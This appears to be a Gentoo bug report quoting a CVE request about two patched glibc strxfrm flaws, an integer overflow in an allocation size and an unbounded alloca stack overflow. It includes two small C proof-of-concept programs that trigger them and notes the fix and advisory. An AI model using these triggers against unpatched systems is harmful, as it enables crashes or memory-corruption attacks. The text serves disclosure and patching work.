From ${URL} : 1. Joseph Myers discovered strxfrm is vulnerable to integer overflows when computing memory allocation sizes (similar to CVE-2012-4412). i.e. in string/strxfrm_l.c: idxarr = (int32_t *) malloc ((srclen + 1) * (sizeof (int32_t) + 1)); Attached strxfrm-int32.c should trigger on 32-bit machines. 2. Shaun Colley discovered strxfrm falls back to an unbounded alloca if malloc fails making it vulnerable to stack-based buffer overflows (similar to CVE-2012-4424) [1]. Attached strxfrm-alloca.c should trigger. Both issues were fixed in glibc 2.21 [2] and a quick check shows vulnerable code appears to go back to at least glibc 2.3. Please allocate CVEs for these issues. Many thanks. --mancha ============== [1] https://sourceware.org/bugzilla/show_bug.cgi?id=16009 [2] https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=0f9e585480ed /* gcc -o strxfrm-alloca strxfrm-alloca.c */ #include <string.h> #include <stdlib.h> #include <locale.h> #define BUFLEN 512000 int main(void) { char *src = malloc(BUFLEN + 1); char *dst = malloc(BUFLEN + 1); char *avail = NULL; memset(src, 'A', BUFLEN); setlocale(LC_ALL, "en_US.UTF-8"); do avail = malloc(BUFLEN); while(avail); int len = strxfrm(dst, src, BUFLEN); return 0; } /* gcc -o strxfrm-int32 strxfrm-int32.c */ #include <string.h> #include <stdlib.h> #include <locale.h> #define BUFLEN 858993459 int main(void) { char *src = malloc(BUFLEN + 1); char *dst = malloc(BUFLEN + 1); memset(src, 'A', BUFLEN); setlocale(LC_ALL, "en_US.UTF-8"); int len = strxfrm(dst, src, BUFLEN); return 0; } @maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
fix is also in glibc-2.20-r2 now
This issue was resolved and addressed in GLSA 201602-02 at https://security.gentoo.org/glsa/201602-02 by GLSA coordinator Tobias Heinlein (keytoaster).
